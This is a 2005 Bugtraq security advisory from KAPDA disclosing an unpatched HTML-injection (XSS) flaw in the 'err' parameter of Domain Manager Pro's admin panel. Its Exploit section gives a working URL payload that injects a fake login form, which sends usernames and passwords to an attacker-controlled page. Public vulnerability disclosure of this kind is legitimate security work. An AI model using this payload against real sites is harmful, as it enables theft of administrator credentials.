[40860] in bugtraq
[KAPDA::#8] Domain Manager Pro Vulnerability
daemon@ATHENA.MIT.EDU (advisory@securityfocus.com,kapda.i)
Mon Oct 24 17:17:08 2005
Date: 21 Oct 2005 22:03:54 -0000
Message-ID: <20051021220354.17750.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: advisory@securityfocus.com, kapda.ir@securityfocus.com
To: bugtraq@securityfocus.com
[KAPDA::#8] Domain Manager Pro Vulnerability
Domain Manager Pro - Fake form injection
KAPDA New advisory
Vulnerable Products : Domain Manager Pro
Vendor: SiteTurn ,http://www.siteturn.com/
Vulnerability: Fake form injection ( XSS)
Date :
--------------------
2005/08/08
1384/05/17 (Hijri Shamsi)
About Domain Manager Pro:
--------------------
SiteTurn's custom designed account control solution, for your Linux based website.
Domain Manager Pro gives you all of the tools you'll need to manage, grow, and
maintain your website and business to the maximum potential, well into the future.
Vendor`s Description : http://www.siteturn.com/pop/serverSoft/domMan.htm
Disscution:
--------------------
A remote user can conduct cross-site scripting attacks.The 'panel' script does not properly
validate user-supplied input at the 'err' parameter.So remote user can inject html script to
fake login form and steal admin`s password.
Exploit:
--------------------
http://[target]/admin/panel?err=Please Login Again<br><font color="black"><form method="POST"
action=[Your Page That Saves Data]>Username: <input name="user"><br>Password: <input name="pass">
<br><input type="Submit" name="subit" value="Login"><noscript>
Solution:
--------------------
Not patched yet by vendor.
More Detail:
--------------------
http://www.kapda.ir/advisory-96.html
Visit above link for more details.
Credit :
--------------------
Farhad Koosha of KAPDA
farhadkey [ at } kapda.ir
Kapda - Security Science Researchers Insitute of Iran
http://www.KAPDA.ir
(PersianHacker.NET)
